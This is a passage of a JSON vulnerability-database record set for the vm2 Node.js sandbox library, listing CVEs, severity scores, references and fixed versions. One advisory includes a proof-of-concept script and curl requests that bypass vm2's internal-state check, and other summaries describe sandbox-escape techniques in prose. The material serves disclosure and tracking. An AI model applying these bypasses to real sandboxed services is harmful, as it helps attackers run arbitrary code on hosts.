security/advisories/GHSA-mrgp-mrhc-5jrq","reference_id":"","reference_type":"","scores":[{"value":"10","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"},{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-04-22T15:37:00Z/"}],"url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-mrgp-mrhc-5jrq"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2022-36067","reference_id":"","reference_type":"","scores":[{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2022-36067"},{"reference_url":"https://security.netapp.com/advisory/ntap-20221017-0002","reference_id":"","reference_type":"","scores":[{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://security.netapp.com/advisory/ntap-20221017-0002"},{"reference_url":"https://www.oxeye.io/blog/vm2-sandbreak-vulnerability-cve-2022-36067","reference_id":"","reference_type":"","scores":[{"value":"10","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"},{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-04-22T15:37:00Z/"}],"url":"https://www.oxeye.io/blog/vm2-sandbreak-vulnerability-cve-2022-36067"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2124794","reference_id":"2124794","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2124794"},{"reference_url":"https://github.com/advisories/GHSA-mrgp-mrhc-5jrq","reference_id":"GHSA-mrgp-mrhc-5jrq","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-mrgp-mrhc-5jrq"},{"reference_url":"https://security.netapp.com/advisory/ntap-20221017-0002/","reference_id":"ntap-20221017-0002","reference_type":"","scores":[{"value":"10","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-04-22T15:37:00Z/"}],"url":"https://security.netapp.com/advisory/ntap-20221017-0002/"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/145543?format=json","purl":"pkg:npm/vm2@3.9.11","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3krt-qmqx-q7c6"},{"vulnerability":"VCID-4dwc-b66t-cuf8"},{"vulnerability":"VCID-4w6q-km6k-5bct"},{"vulnerability":"VCID-75hb-ytcw-4khu"},{"vulnerability":"VCID-8s8x-85t4-m7cg"},{"vulnerability":"VCID-d6mv-1b7h-5fef"},{"vulnerability":"VCID-ej5b-1m7b-hkf8"},{"vulnerability":"VCID-f2j1-dxbm-sfgc"},{"vulnerability":"VCID-gqm5-bhj5-k3cf"},{"vulnerability":"VCID-gqum-k4dn-fbe7"},{"vulnerability":"VCID-hhxv-v932-cuf7"},{"vulnerability":"VCID-hv69-paun-p7d7"},{"vulnerability":"VCID-ku6f-9qqg-aqe6"},{"vulnerability":"VCID-mvte-m5qa-budj"},{"vulnerability":"VCID-ng7k-8x8k-pye1"},{"vulnerability":"VCID-pytn-u4me-9bee"},{"vulnerability":"VCID-rd8s-311d-8qcq"},{"vulnerability":"VCID-t48f-zxgy-m7az"},{"vulnerability":"VCID-t5ax-32h1-13ha"},{"vulnerability":"VCID-v8ca-8eew-aqah"},{"vulnerability":"VCID-wpfa-k33c-zff4"},{"vulnerability":"VCID-ws53-29ft-u7dp"},{"vulnerability":"VCID-xe8d-un3q-myc9"},{"vulnerability":"VCID-zeup-86es-xkc4"},{"vulnerability":"VCID-zz97-v3rg-1bck"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/vm2@3.9.11"}],"aliases":["CVE-2022-36067","GHSA-mrgp-mrhc-5jrq"],"risk_score":10.0,"exploitability":"2.0","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-jv3n-721k-z3h7"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/45650?format=json","vulnerability_id":"VCID-ku6f-9qqg-aqe6","summary":"vm2 Sandbox Escape vulnerability\nIn vm2 for versions up to 3.9.19, `Promise` handler sanitization can be bypassed, allowing attackers to escape the sandbox and run arbitrary code.","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2023-37466.json","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2023-37466.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-37466","reference_id":"","reference_type":"","scores":[{"value":"0.04929","scoring_system":"epss","scoring_elements":"0.8983","published_at":"2026-06-09T12:55:00Z"},{"value":"0.04929","scoring_system":"epss","scoring_elements":"0.89816","published_at":"2026-06-06T12:55:00Z"},{"value":"0.04929","scoring_system":"epss","scoring_elements":"0.89814","published_at":"2026-06-08T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-37466"},{"reference_url":"https://gist.github.com/leesh3288/f693061e6523c97274ad5298eb2c74e9","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://gist.github.com/leesh3288/f693061e6523c97274ad5298eb2c74e9"},{"reference_url":"https://github.com/patriksimek/vm2","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2"},{"reference_url":"https://github.com/patriksimek/vm2/commit/d9a1fde8ec5a5a9c9e5a69bf91d703950859d744","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2024-10-15T17:36:22Z/"}],"url":"https://github.com/patriksimek/vm2/commit/d9a1fde8ec5a5a9c9e5a69bf91d703950859d744"},{"reference_url":"https://github.com/patriksimek/vm2/releases/tag/v3.10.0","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2024-10-15T17:36:22Z/"}],"url":"https://github.com/patriksimek/vm2/releases/tag/v3.10.0"},{"reference_url":"https://security.netapp.com/advisory/ntap-20230831-0007","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://security.netapp.com/advisory/ntap-20230831-0007"},{"reference_url":"https://security.netapp.com/advisory/ntap-20241108-0002","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://security.netapp.com/advisory/ntap-20241108-0002"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2232376","reference_id":"2232376","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2232376"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-37466","reference_id":"CVE-2023-37466","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-37466"},{"reference_url":"https://github.com/advisories/GHSA-cchq-frgv-rjh5","reference_id":"GHSA-cchq-frgv-rjh5","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-cchq-frgv-rjh5"},{"reference_url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-cchq-frgv-rjh5","reference_id":"GHSA-cchq-frgv-rjh5","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2024-10-15T17:36:22Z/"}],"url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-cchq-frgv-rjh5"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/66121?format=json","purl":"pkg:npm/vm2@3.10.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3krt-qmqx-q7c6"},{"vulnerability":"VCID-4w6q-km6k-5bct"},{"vulnerability":"VCID-8s8x-85t4-m7cg"},{"vulnerability":"VCID-ej5b-1m7b-hkf8"},{"vulnerability":"VCID-f2j1-dxbm-sfgc"},{"vulnerability":"VCID-gqm5-bhj5-k3cf"},{"vulnerability":"VCID-gqum-k4dn-fbe7"},{"vulnerability":"VCID-hv69-paun-p7d7"},{"vulnerability":"VCID-mvte-m5qa-budj"},{"vulnerability":"VCID-ng7k-8x8k-pye1"},{"vulnerability":"VCID-pytn-u4me-9bee"},{"vulnerability":"VCID-rd8s-311d-8qcq"},{"vulnerability":"VCID-t48f-zxgy-m7az"},{"vulnerability":"VCID-t5ax-32h1-13ha"},{"vulnerability":"VCID-wpfa-k33c-zff4"},{"vulnerability":"VCID-ws53-29ft-u7dp"},{"vulnerability":"VCID-xe8d-un3q-myc9"},{"vulnerability":"VCID-zeup-86es-xkc4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/vm2@3.10.0"}],"aliases":["CVE-2023-37466","GHSA-cchq-frgv-rjh5"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ku6f-9qqg-aqe6"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/61344?format=json","vulnerability_id":"VCID-mvte-m5qa-budj","summary":"vm2: vm2: Arbitrary code execution due to sandbox escape vulnerability","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-24120.json","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-24120.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-24120","reference_id":"","reference_type":"","scores":[{"value":"0.00129","scoring_system":"epss","scoring_elements":"0.31788","published_at":"2026-06-09T12:55:00Z"},{"value":"0.00129","scoring_system":"epss","scoring_elements":"0.31866","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00129","scoring_system":"epss","scoring_elements":"0.31834","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00129","scoring_system":"epss","scoring_elements":"0.31796","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00129","scoring_system":"epss","scoring_elements":"0.31764","published_at":"2026-06-08T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-24120"},{"reference_url":"https://github.com/patriksimek/vm2","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2"},{"reference_url":"https://github.com/patriksimek/vm2/releases/tag/v3.10.5","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-05-05T01:00:04Z/"}],"url":"https://github.com/patriksimek/vm2/releases/tag/v3.10.5"},{"reference_url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-qvjj-29qf-hp7p","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-05-05T01:00:04Z/"}],"url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-qvjj-29qf-hp7p"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-24120","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-24120"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2466529","reference_id":"2466529","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2466529"},{"reference_url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-cchq-frgv-rjh5","reference_id":"GHSA-cchq-frgv-rjh5","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-cchq-frgv-rjh5"},{"reference_url":"https://github.com/advisories/GHSA-qvjj-29qf-hp7p","reference_id":"GHSA-qvjj-29qf-hp7p","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-qvjj-29qf-hp7p"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/114464?format=json","purl":"pkg:npm/vm2@3.10.5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3krt-qmqx-q7c6"},{"vulnerability":"VCID-4w6q-km6k-5bct"},{"vulnerability":"VCID-73yk-bmf3-d3e3"},{"vulnerability":"VCID-8s8x-85t4-m7cg"},{"vulnerability":"VCID-d3fg-nauj-p3gk"},{"vulnerability":"VCID-ej5b-1m7b-hkf8"},{"vulnerability":"VCID-f2j1-dxbm-sfgc"},{"vulnerability":"VCID-gqum-k4dn-fbe7"},{"vulnerability":"VCID-hv69-paun-p7d7"},{"vulnerability":"VCID-ng7k-8x8k-pye1"},{"vulnerability":"VCID-rd8s-311d-8qcq"},{"vulnerability":"VCID-t48f-zxgy-m7az"},{"vulnerability":"VCID-t5ax-32h1-13ha"},{"vulnerability":"VCID-wpfa-k33c-zff4"},{"vulnerability":"VCID-ws53-29ft-u7dp"},{"vulnerability":"VCID-xe8d-un3q-myc9"},{"vulnerability":"VCID-zeup-86es-xkc4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/vm2@3.10.5"}],"aliases":["CVE-2026-24120","GHSA-qvjj-29qf-hp7p"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-mvte-m5qa-budj"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/94014?format=json","vulnerability_id":"VCID-ng7k-8x8k-pye1","summary":"vm2's Transformer Fast-Path Bypass Exposes Internal State Variable\n### Summary\nvm2's code transformer has a performance optimization that skips AST analysis when the code does not contain `catch`, `import`, or `async` keywords. This fast-path bypass allows sandboxed code to directly access the internal `VM2_INTERNAL_STATE_DO_NOT_USE_OR_PROGRAM_WILL_FAIL` variable, which exposes internal security functions (`handleException`, `wrapWith`, `import`).\n\n### Details\nIn `lib/transformer.js:55-57`, a regex check `/\\b(?:catch|import|async)\\b/` determines whether AST transformation is needed. If the code does not contain any of these keywords, the transformer returns the code unmodified.\n\nWhen the fast-path is taken:\n1. **INTERNAL_STATE_NAME identifier check is bypassed**: The AST visitor that blocks access to `VM2_INTERNAL_STATE_DO_NOT_USE_OR_PROGRAM_WILL_FAIL` never runs\n2. **`with` statement instrumentation is bypassed**: `with()` statements are not wrapped with `wrapWith()`, enabling scope manipulation\n3. The internal state object exposes: `handleException(e)`, `wrapWith(x)`, `import(what)`\n\nWhile these methods are currently defensive utilities (not direct escape vectors), this represents a complete bypass of a security control. Any future addition of a sensitive method to the internal state object would be immediately exploitable.\n\n### PoC\n\n**Library-level PoC (Node.js script — primary):**\n```javascript\nconst { VM } = require(\"vm2\");\nconst vm = new VM();\n\n// Access internal state (bypassed — no catch/import/async keywords)\nconst result = vm.run(`\n var x = VM2_INTERNAL_STATE_DO_NOT_USE_OR_PROGRAM_WILL_FAIL;\n Object.keys(x).join(\",\")\n`);\nconsole.log(result); // \"wrapWith,handleException,import\"\n\n// Control test — blocked when catch keyword is present\ntry {\n vm.run(`\n try {\n var x = VM2_INTERNAL_STATE_DO_NOT_USE_OR_PROGRAM_WILL_FAIL;\n } catch(e) { e.message }\n `);\n} catch(e) {\n console.log(e.message); // \"Use of internal vm2 state variable\"\n}\n```\n\n**HTTP demonstration:**\n```bash\n# Internal state access (bypassed)\ncurl -s -X POST http://localhost:3000/api/execute \\\n -H \"Content-Type: application/json\" \\\n -d '{\"code\":\"var x = VM2_INTERNAL_STATE_DO_NOT_USE_OR_PROGRAM_WILL_FAIL; Object.keys(x).join(\\\",\\\")\"}'\n# Result: \"wrapWith,handleException,import\"\n\n# Control test — blocked when catch keyword is present\ncurl -s -X POST http://localhost:3000/api/execute \\\n -H \"Content-Type: application/json\" \\\n -d '{\"code\":\"try { var x = VM2_INTERNAL_STATE_DO_NOT_USE_OR_PROGRAM_WILL_FAIL; } catch(e) { e.message }\"}'\n# Result: {\"errors\":[\"Use of internal vm2 state variable\"]}\n```\n\n**Suggested fix:**\n```javascript\n// transformer.js:55 — add 'with' keyword and INTERNAL_STATE_NAME check\nif (!/\\b(?:catch|import|async|with)\\b/.test(code) && code.indexOf(INTERNAL_STATE_NAME) === -1) {\n return {__proto__: null, code, hasAsync: false};\n}\n```\n\n### Impact\n- **Security Control Bypass**: The INTERNAL_STATE_NAME access restriction is completely ineffective when the code avoids 3 specific keywords.\n- **Defense-in-Depth Violation**: Internal security functions are exposed, creating a latent attack surface for future code changes.\n- **Scope**: All applications using vm2. No special configuration required.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44003","reference_id":"","reference_type":"","scores":[{"value":"0.00049","scoring_system":"epss","scoring_elements":"0.15773","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00049","scoring_system":"epss","scoring_elements":"0.15655","published_at":"2026-06-09T12:55:00Z"},{"value":"0.00049","scoring_system":"epss","scoring_elements":"0.15636","published_at":"2026-06-08T12:55:00Z"},{"value":"0.00049","scoring_system":"epss","scoring_elements":"0.15722","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00049","scoring_system":"epss","scoring_elements":"0.15763","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44003"},{"reference_url":"https://github.com/patriksimek/vm2","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2"},{"reference_url":"https://github.com/patriksimek/vm2/releases/tag/v3.11.0","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2/releases/tag/v3.11.0"},{"reference_url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-wp5r-2gw5-m7q7","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-13T18:40:49Z/"}],"url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-wp5r-2gw5-m7q7"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44003","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44003"},{"reference_url":"https://github.com/advisories/GHSA-wp5r-2gw5-m7q7","reference_id":"GHSA-wp5r-2gw5-m7q7","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-wp5r-2gw5-m7q7"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/114499?format=json","purl":"pkg:npm/vm2@3.11.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-t48f-zxgy-m7az"},{"vulnerability":"VCID-t5ax-32h1-13ha"},{"vulnerability":"VCID-wpfa-k33c-zff4"},{"vulnerability":"VCID-zeup-86es-xkc4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/vm2@3.11.0"}],"aliases":["CVE-2026-44003","GHSA-wp5r-2gw5-m7q7"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ng7k-8x8k-pye1"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/110434?format=json","vulnerability_id":"VCID-pfwa-v62j-cyds","summary":"vm2 before 3.6.11 vulnerable to sandbox escape\nThis affects the package vm2 before 3.6.11. It is possible to trigger a RangeError exception from the host rather than the \"sandboxed\" context by reaching the stack call limit with an infinite recursion. The returned object is then used to reference the mainModule property of the host code running the script allowing it to spawn a child_process and execute arbitrary code.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2019-10761","reference_id":"","reference_type":"","scores":[{"value":"0.00818","scoring_system":"epss","scoring_elements":"0.74734","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00818","scoring_system":"epss","scoring_elements":"0.74743","published_at":"2026-06-09T12:55:00Z"},{"value":"0.00818","scoring_system":"epss","scoring_elements":"0.74717","published_at":"2026-06-08T12:55:00Z"},{"value":"0.00818","scoring_system":"epss","scoring_elements":"0.7471","published_at":"2026-06-04T12:55:00Z"},{"value":"0.00818","scoring_system":"epss","scoring_elements":"0.74746","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00818","scoring_system":"epss","scoring_elements":"0.74741","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2019-10761"},{"reference_url":"https://gist.github.com/JLLeitschuh/609bb2efaff22ed84fe182cf574c023a","reference_id":"","reference_type":"","scores":[{"value":"8.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://gist.github.com/JLLeitschuh/609bb2efaff22ed84fe182cf574c023a"},{"reference_url":"https://github.com/patriksimek/vm2","reference_id":"","reference_type":"","scores":[{"value":"8.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2"},{"reference_url":"https://github.com/patriksimek/vm2/commit/4b22d704e4794af63a5a2d633385fd20948f6f90","reference_id":"","reference_type":"","scores":[{"value":"8.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2/commit/4b22d704e4794af63a5a2d633385fd20948f6f90"},{"reference_url":"https://github.com/patriksimek/vm2/issues/197","reference_id":"","reference_type":"","scores":[{"value":"8.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2/issues/197"},{"reference_url":"https://github.com/patriksimek/vm2/issues/197#issuecomment-480643832","reference_id":"","reference_type":"","scores":[{"value":"8.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2/issues/197#issuecomment-480643832"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2019-10761","reference_id":"","reference_type":"","scores":[{"value":"8.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2019-10761"},{"reference_url":"https://snyk.io/vuln/SNYK-JS-VM2-473188","reference_id":"","reference_type":"","scores":[{"value":"8.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://snyk.io/vuln/SNYK-JS-VM2-473188"},{"reference_url":"https://github.com/advisories/GHSA-wf5x-cr3r-xr77","reference_id":"GHSA-wf5x-cr3r-xr77","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-wf5x-cr3r-xr77"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/149094?format=json","purl":"pkg:npm/vm2@3.6.11","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1p1e-z4rv-1bfn"},{"vulnerability":"VCID-3krt-qmqx-q7c6"},{"vulnerability":"VCID-4dwc-b66t-cuf8"},{"vulnerability":"VCID-4w6q-km6k-5bct"},{"vulnerability":"VCID-75hb-ytcw-4khu"},{"vulnerability":"VCID-7k1u-5wfd-sfgn"},{"vulnerability":"VCID-8s8x-85t4-m7cg"},{"vulnerability":"VCID-d6mv-1b7h-5fef"},{"vulnerability":"VCID-ej5b-1m7b-hkf8"},{"vulnerability":"VCID-f2j1-dxbm-sfgc"},{"vulnerability":"VCID-gqm5-bhj5-k3cf"},{"vulnerability":"VCID-gqum-k4dn-fbe7"},{"vulnerability":"VCID-hhxv-v932-cuf7"},{"vulnerability":"VC